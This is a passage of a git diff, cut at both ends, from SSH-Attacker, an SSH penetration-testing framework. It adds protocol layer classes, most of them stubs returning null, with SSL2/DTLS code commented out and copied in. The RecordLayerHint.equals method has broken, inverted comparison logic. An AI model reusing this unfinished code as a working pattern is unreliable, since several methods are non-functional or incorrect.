epoch, int sequenceNumber) { + this.type = type; + this.epoch = epoch; + this.sequenceNumber = sequenceNumber; + this.messageSequence = null; + } + + public RecordLayerHint(ProtocolMessageType type, int messageSequence) { + this.type = type; + this.epoch = null; + this.sequenceNumber = null; + this.messageSequence = messageSequence; + } + + @Override + public boolean equals(Object other) { + if (other instanceof RecordLayerHint) { + RecordLayerHint otherHint = (RecordLayerHint) other; + if (this.type == otherHint.type) { + return true; + } + if (this.epoch == otherHint.epoch) { + return false; + } + if (this.sequenceNumber == otherHint.sequenceNumber) { + return true; + } + if (this.messageSequence == otherHint.messageSequence) { + return true; + } + } + return false; + } + + @Override + public int hashCode() { + int hash = 3; + hash = 79 * hash + Objects.hashCode(this.type); + hash = 79 * hash + Objects.hashCode(this.epoch); + hash = 79 * hash + Objects.hashCode(this.sequenceNumber); + hash = 79 * hash + Objects.hashCode(this.messageSequence); + return hash; + } + + public ProtocolMessageType getType() { + return type; + } + + public Integer getEpoch() { + return epoch; + } + + public Integer getSequenceNumber() { + return sequenceNumber; + } + + public Integer getMessageSequence() { + return messageSequence; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/AuthenticationLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/AuthenticationLayer.java new file mode 100644 index 000000000..e59378c51 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/AuthenticationLayer.java @@ -0,0 +1,229 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.impl; + +/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; +import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; +import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.message.*;*/ + +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; +import de.rub.nds.sshattacker.core.layer.ProtocolLayer; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; +import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import java.io.IOException; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthenticationLayer extends ProtocolLayer { + + private static final Logger LOGGER = LogManager.getLogger(); + private SshContext context; + + public AuthenticationLayer(SshContext context) { + super(ImplementedLayers.AuthenticationLayer); + this.context = context; + } + + @Override + public LayerProcessingResult sendConfiguration() throws IOException { + /*LayerConfiguration configuration = getLayerConfiguration(); + if (configuration != null && !configuration.getContainerList().isEmpty()) { + for (ProtocolMessage ssl2message : configuration.getContainerList()) { + ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); + preparator.prepare(); + preparator.afterPrepare(); + ssl2message.getHandler(context).adjustContext(ssl2message); + ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); + ssl2message.setCompleteResultingMessage(serializedMessage); + ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); + ssl2message.getHandler(context).updateDigest(ssl2message, true); + getLowerLayer() + .sendData( + new RecordLayerHint(ssl2message.getProtocolMessageType()), + serializedMessage); + addProducedContainer(ssl2message); + } + } + return getLayerResult();*/ + return null; + } + + @Override + public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additionalData) + throws IOException { + return sendConfiguration(); + } + + @Override + public LayerProcessingResult receiveData() { + + /*try { + int messageLength = 0; + byte paddingLength = 0; + byte[] totalHeader; + HintedInputStream dataStream = null; + SSL2MessageType messageType; + try { + + dataStream = getLowerLayer().getDataStream(); + totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); + + if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { + messageLength = resolveUnpaddedMessageLength(totalHeader); + paddingLength = 0x00; + } else { + messageLength = resolvePaddedMessageLength(totalHeader); + paddingLength = dataStream.readByte(); + } + messageType = SSL2MessageType.getMessageType(dataStream.readByte()); + } catch (IOException e) { + LOGGER.warn( + "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); + messageType = SSL2MessageType.SSL_UNKNOWN; + } + + SSL2Message message = null; + + switch (messageType) { + case SSL_CLIENT_HELLO: + message = new SSL2ClientHelloMessage(); + break; + case SSL_CLIENT_MASTER_KEY: + message = new SSL2ClientMasterKeyMessage(); + break; + case SSL_SERVER_VERIFY: + message = new SSL2ServerVerifyMessage(); + break; + case SSL_SERVER_HELLO: + message = new SSL2ServerHelloMessage(); + break; + default: + message = new UnknownSSL2Message(); + } + + message.setType((byte) messageType.getType()); + message.setMessageLength(messageLength); + message.setPaddingLength((int) paddingLength); + readDataContainer(message, context); + + } catch (TimeoutException ex) { + LOGGER.debug(ex); + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more messages", ex); + } + + return getLayerResult();*/ + return null; + } + + /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { + return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 + | totalHeaderLength[1]; + } + + private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { + return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 + | totalHeaderLength[1]; + }*/ + + @Override + public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + try { + HintedInputStream dataStream = null; + dataStream = getLowerLayer().getDataStream(); + if (dataStream.getHint() == null) { + LOGGER.warn( + "The DTLS fragment layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); + currentInputStream = new HintedLayerInputStream(null, this); + currentInputStream.extendStream(dataStream.readAllBytes()); + } else if (dataStream.getHint() instanceof RecordLayerHint) { + RecordLayerHint tempHint = (RecordLayerHint) dataStream.getHint(); + /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { + DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); + fragment.setEpoch(tempHint.getEpoch()); + DtlsHandshakeMessageFragmentParser parser = + fragment.getParser( + context, + new ByteArrayInputStream( + dataStream.readChunk(dataStream.available()))); + parser.parse(fragment); + fragment.setCompleteResultingMessage( + fragment.getSerializer(context).serialize()); + fragmentManager.addMessageFragment(fragment); + List uninterpretedMessageFragments = + fragmentManager.getOrderedCombinedUninterpretedMessageFragments( + true, false); + // run until we received a complete fragment + if (!uninterpretedMessageFragments.isEmpty()) { + DtlsHandshakeMessageFragment uninterpretedMessageFragment = + uninterpretedMessageFragments.get(0); + addProducedContainer(uninterpretedMessageFragment); + RecordLayerHint currentHint = + new RecordLayerHint( + uninterpretedMessageFragment.getProtocolMessageType(), + uninterpretedMessageFragment + .getMessageSequence() + .getValue()); + byte type = uninterpretedMessageFragment.getType().getValue(); + byte[] content = + uninterpretedMessageFragment.getMessageContent().getValue(); + byte[] message = + ArrayConverter.concatenate( + new byte[] {type}, + ArrayConverter.intToBytes( + content.length, + HandshakeByteLength.MESSAGE_LENGTH_FIELD), + content); + if (desiredHint == null || currentHint.equals(desiredHint)) { + if (currentInputStream == null) { + currentInputStream = new HintedLayerInputStream(currentHint, this); + } else { + currentInputStream.setHint(currentHint); + } + currentInputStream.extendStream(message); + } else { + if (nextInputStream == null) { + nextInputStream = new HintedLayerInputStream(currentHint, this); + } else { + nextInputStream.setHint(currentHint); + } + nextInputStream.extendStream(message); + } + } else { + receiveMoreDataForHint(desiredHint); + } + } else { + currentInputStream = new HintedLayerInputStream(tempHint, this); + currentInputStream.extendStream(dataStream.readChunk(dataStream.available())); + }*/ + } + } catch (TimeoutException ex) { + LOGGER.debug(ex); + throw ex; + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more dtls fragments", ex); + throw ex; + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/ConnectionLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/ConnectionLayer.java new file mode 100644 index 000000000..77051d0b2 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/ConnectionLayer.java @@ -0,0 +1,229 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.impl; + +/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; +import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; +import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.message.*;*/ + +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; +import de.rub.nds.sshattacker.core.layer.ProtocolLayer; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; +import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import java.io.IOException; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ConnectionLayer extends ProtocolLayer { + + private static final Logger LOGGER = LogManager.getLogger(); + private SshContext context; + + public ConnectionLayer(SshContext context) { + super(ImplementedLayers.ConnectionLayer); + this.context = context; + } + + @Override + public LayerProcessingResult sendConfiguration() throws IOException { + /*LayerConfiguration configuration = getLayerConfiguration(); + if (configuration != null && !configuration.getContainerList().isEmpty()) { + for (ProtocolMessage ssl2message : configuration.getContainerList()) { + ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); + preparator.prepare(); + preparator.afterPrepare(); + ssl2message.getHandler(context).adjustContext(ssl2message); + ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); + ssl2message.setCompleteResultingMessage(serializedMessage); + ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); + ssl2message.getHandler(context).updateDigest(ssl2message, true); + getLowerLayer() + .sendData( + new RecordLayerHint(ssl2message.getProtocolMessageType()), + serializedMessage); + addProducedContainer(ssl2message); + } + } + return getLayerResult();*/ + return null; + } + + @Override + public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additionalData) + throws IOException { + return sendConfiguration(); + } + + @Override + public LayerProcessingResult receiveData() { + + /*try { + int messageLength = 0; + byte paddingLength = 0; + byte[] totalHeader; + HintedInputStream dataStream = null; + SSL2MessageType messageType; + try { + + dataStream = getLowerLayer().getDataStream(); + totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); + + if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { + messageLength = resolveUnpaddedMessageLength(totalHeader); + paddingLength = 0x00; + } else { + messageLength = resolvePaddedMessageLength(totalHeader); + paddingLength = dataStream.readByte(); + } + messageType = SSL2MessageType.getMessageType(dataStream.readByte()); + } catch (IOException e) { + LOGGER.warn( + "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); + messageType = SSL2MessageType.SSL_UNKNOWN; + } + + SSL2Message message = null; + + switch (messageType) { + case SSL_CLIENT_HELLO: + message = new SSL2ClientHelloMessage(); + break; + case SSL_CLIENT_MASTER_KEY: + message = new SSL2ClientMasterKeyMessage(); + break; + case SSL_SERVER_VERIFY: + message = new SSL2ServerVerifyMessage(); + break; + case SSL_SERVER_HELLO: + message = new SSL2ServerHelloMessage(); + break; + default: + message = new UnknownSSL2Message(); + } + + message.setType((byte) messageType.getType()); + message.setMessageLength(messageLength); + message.setPaddingLength((int) paddingLength); + readDataContainer(message, context); + + } catch (TimeoutException ex) { + LOGGER.debug(ex); + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more messages", ex); + } + + return getLayerResult();*/ + return null; + } + + /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { + return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 + | totalHeaderLength[1]; + } + + private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { + return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 + | totalHeaderLength[1]; + }*/ + + @Override + public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + try { + HintedInputStream dataStream = null; + dataStream = getLowerLayer().getDataStream(); + if (dataStream.getHint() == null) { + LOGGER.warn( + "The DTLS fragment layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); + currentInputStream = new HintedLayerInputStream(null, this); + currentInputStream.extendStream(dataStream.readAllBytes()); + } else if (dataStream.getHint() instanceof RecordLayerHint) { + RecordLayerHint tempHint = (RecordLayerHint) dataStream.getHint(); + /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { + DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); + fragment.setEpoch(tempHint.getEpoch()); + DtlsHandshakeMessageFragmentParser parser = + fragment.getParser( + context, + new ByteArrayInputStream( + dataStream.readChunk(dataStream.available()))); + parser.parse(fragment); + fragment.setCompleteResultingMessage( + fragment.getSerializer(context).serialize()); + fragmentManager.addMessageFragment(fragment); + List uninterpretedMessageFragments = + fragmentManager.getOrderedCombinedUninterpretedMessageFragments( + true, false); + // run until we received a complete fragment + if (!uninterpretedMessageFragments.isEmpty()) { + DtlsHandshakeMessageFragment uninterpretedMessageFragment = + uninterpretedMessageFragments.get(0); + addProducedContainer(uninterpretedMessageFragment); + RecordLayerHint currentHint = + new RecordLayerHint( + uninterpretedMessageFragment.getProtocolMessageType(), + uninterpretedMessageFragment + .getMessageSequence() + .getValue()); + byte type = uninterpretedMessageFragment.getType().getValue(); + byte[] content = + uninterpretedMessageFragment.getMessageContent().getValue(); + byte[] message = + ArrayConverter.concatenate( + new byte[] {type}, + ArrayConverter.intToBytes( + content.length, + HandshakeByteLength.MESSAGE_LENGTH_FIELD), + content); + if (desiredHint == null || currentHint.equals(desiredHint)) { + if (currentInputStream == null) { + currentInputStream = new HintedLayerInputStream(currentHint, this); + } else { + currentInputStream.setHint(currentHint); + } + currentInputStream.extendStream(message); + } else { + if (nextInputStream == null) { + nextInputStream = new HintedLayerInputStream(currentHint, this); + } else { + nextInputStream.setHint(currentHint); + } + nextInputStream.extendStream(message); + } + } else { + receiveMoreDataForHint(desiredHint); + } + } else { + currentInputStream = new HintedLayerInputStream(tempHint, this); + currentInputStream.extendStream(dataStream.readChunk(dataStream.available())); + }*/ + } + } catch (TimeoutException ex) { + LOGGER.debug(ex); + throw ex; + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more dtls fragments", ex); + throw ex; + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java new file mode 100644 index 000000000..8e9aeea6f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -0,0 +1,228 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.impl; + +/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; +import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; +import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.message.*;*/ +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; +import de.rub.nds.sshattacker.core.layer.ProtocolLayer; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; +import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import java.io.IOException; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SSH1Layer extends ProtocolLayer { + + private static final Logger LOGGER = LogManager.getLogger(); + private SshContext context; + + public SSH1Layer(SshContext context) { + super(ImplementedLayers.SSHv1); + this.context = context; + } + + @Override + public LayerProcessingResult sendConfiguration() throws IOException { + /*LayerConfiguration configuration = getLayerConfiguration(); + if (configuration != null && !configuration.getContainerList().isEmpty()) { + for (ProtocolMessage ssl2message : configuration.getContainerList()) { + ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); + preparator.prepare(); + preparator.afterPrepare(); + ssl2message.getHandler(context).adjustContext(ssl2message); + ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); + ssl2message.setCompleteResultingMessage(serializedMessage); + ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); + ssl2message.getHandler(context).updateDigest(ssl2message, true); + getLowerLayer() + .sendData( + new RecordLayerHint(ssl2message.getProtocolMessageType()), + serializedMessage); + addProducedContainer(ssl2message); + } + } + return getLayerResult();*/ + return null; + } + + @Override + public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additionalData) + throws IOException { + return sendConfiguration(); + } + + @Override + public LayerProcessingResult receiveData() { + + /*try { + int messageLength = 0; + byte paddingLength = 0; + byte[] totalHeader; + HintedInputStream dataStream = null; + SSL2MessageType messageType; + try { + + dataStream = getLowerLayer().getDataStream(); + totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); + + if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { + messageLength = resolveUnpaddedMessageLength(totalHeader); + paddingLength = 0x00; + } else { + messageLength = resolvePaddedMessageLength(totalHeader); + paddingLength = dataStream.readByte(); + } + messageType = SSL2MessageType.getMessageType(dataStream.readByte()); + } catch (IOException e) { + LOGGER.warn( + "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); + messageType = SSL2MessageType.SSL_UNKNOWN; + } + + SSL2Message message = null; + + switch (messageType) { + case SSL_CLIENT_HELLO: + message = new SSL2ClientHelloMessage(); + break; + case SSL_CLIENT_MASTER_KEY: + message = new SSL2ClientMasterKeyMessage(); + break; + case SSL_SERVER_VERIFY: + message = new SSL2ServerVerifyMessage(); + break; + case SSL_SERVER_HELLO: + message = new SSL2ServerHelloMessage(); + break; + default: + message = new UnknownSSL2Message(); + } + + message.setType((byte) messageType.getType()); + message.setMessageLength(messageLength); + message.setPaddingLength((int) paddingLength); + readDataContainer(message, context); + + } catch (TimeoutException ex) { + LOGGER.debug(ex); + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more messages", ex); + } + + return getLayerResult();*/ + return null; + } + + /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { + return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 + | totalHeaderLength[1]; + } + + private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { + return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 + | totalHeaderLength[1]; + }*/ + + @Override + public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + try { + HintedInputStream dataStream = null; + dataStream = getLowerLayer().getDataStream(); + if (dataStream.getHint() == null) { + LOGGER.warn( + "The DTLS fragment layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); + currentInputStream = new HintedLayerInputStream(null, this); + currentInputStream.extendStream(dataStream.readAllBytes()); + } else if (dataStream.getHint() instanceof RecordLayerHint) { + RecordLayerHint tempHint = (RecordLayerHint) dataStream.getHint(); + /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { + DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); + fragment.setEpoch(tempHint.getEpoch()); + DtlsHandshakeMessageFragmentParser parser = + fragment.getParser( + context, + new ByteArrayInputStream( + dataStream.readChunk(dataStream.available()))); + parser.parse(fragment); + fragment.setCompleteResultingMessage( + fragment.getSerializer(context).serialize()); + fragmentManager.addMessageFragment(fragment); + List uninterpretedMessageFragments = + fragmentManager.getOrderedCombinedUninterpretedMessageFragments( + true, false); + // run until we received a complete fragment + if (!uninterpretedMessageFragments.isEmpty()) { + DtlsHandshakeMessageFragment uninterpretedMessageFragment = + uninterpretedMessageFragments.get(0); + addProducedContainer(uninterpretedMessageFragment); + RecordLayerHint currentHint = + new RecordLayerHint( + uninterpretedMessageFragment.getProtocolMessageType(), + uninterpretedMessageFragment + .getMessageSequence() + .getValue()); + byte type = uninterpretedMessageFragment.getType().getValue(); + byte[] content = + uninterpretedMessageFragment.getMessageContent().getValue(); + byte[] message = + ArrayConverter.concatenate( + new byte[] {type}, + ArrayConverter.intToBytes( + content.length, + HandshakeByteLength.MESSAGE_LENGTH_FIELD), + content); + if (desiredHint == null || currentHint.equals(desiredHint)) { + if (currentInputStream == null) { + currentInputStream = new HintedLayerInputStream(currentHint, this); + } else { + currentInputStream.setHint(currentHint); + } + currentInputStream.extendStream(message); + } else { + if (nextInputStream == null) { + nextInputStream = new HintedLayerInputStream(currentHint, this); + } else { + nextInputStream.setHint(currentHint); + } + nextInputStream.extendStream(message); + } + } else { + receiveMoreDataForHint(desiredHint); + } + } else { + currentInputStream = new HintedLayerInputStream(tempHint, this); + currentInputStream.extendStream(dataStream.readChunk(dataStream.available())); + }*/ + } + } catch (TimeoutException ex) { + LOGGER.debug(ex); + throw ex; + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more dtls fragments", ex); + throw ex; + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java new file mode 100644 index 000000000..7ae0f6992 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -0,0 +1,88 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.impl; + +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; +import de.rub.nds.sshattacker.core.layer.ProtocolLayer; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; +import de.rub.nds.sshattacker.core.layer.context.TcpContext; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; +import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; +import de.rub.nds.tlsattacker.transport.tcp.TcpTransportHandler; +import java.io.IOException; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** + * The TCP layer is a wrapper around an underlying TCP socket. It forwards the sockets InputStream + * for reading and sends any data over the TCP socket without modifications. + */ +public class TcpLayer extends ProtocolLayer { + + private static Logger LOGGER = LogManager.getLogger(); + + private final TcpContext context; + + public TcpLayer(TcpContext context) { + super(ImplementedLayers.TCP); + this.context = context; + } + + @Override + public LayerProcessingResult sendConfiguration() throws IOException { + LayerConfiguration configuration = getLayerConfiguration(); + if (configuration != null && configuration.getContainerList() != null) { + for (DataContainer container : configuration.getContainerList()) { + // TODO Send container data + } + } + return getLayerResult(); + } + + /** Sends data over the TCP socket. */ + @Override + public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] data) + throws IOException { + TcpTransportHandler handler = getTransportHandler(); + handler.sendData(data); + return new LayerProcessingResult(null, getLayerType(), true); // Not implemented + } + + @Override + public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + // There is nothing we can do here to fill up our stream, either there is data in it + // or not + } + + /** Returns the inputStream associated with the TCP socket. */ + @Override + public HintedInputStream getDataStream() { + getTransportHandler().setTimeout(getTransportHandler().getTimeout()); + currentInputStream = + new HintedInputStreamAdapterStream(null, getTransportHandler().getInputStream()); + return currentInputStream; + } + + @Override + public LayerProcessingResult receiveData() { + return new LayerProcessingResult(null, getLayerType(), true); + } + + private TcpTransportHandler getTransportHandler() { + if (context.getTransportHandler() == null) { + throw new RuntimeException("TransportHandler is not set in context!"); + } + if (!(context.getTransportHandler() instanceof TcpTransportHandler)) { + throw new RuntimeException("Trying to set TCP layer with non TCP TransportHandler"); + } + return (TcpTransportHandler) context.getTransportHandler(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java new file mode 100644 index 000000000..0f6867dad --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -0,0 +1,265 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.impl; + +/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; +import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; +import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.message.*;*/ + +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; +import de.rub.nds.sshattacker.core.layer.ProtocolLayer; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; +import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.session.Session; +import de.rub.nds.sshattacker.core.session.preparator.SessionPreparator; +import de.rub.nds.sshattacker.core.session.serializer.SessionSerializer; +import java.io.IOException; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class TransportLayer extends ProtocolLayer { + + private static final Logger LOGGER = 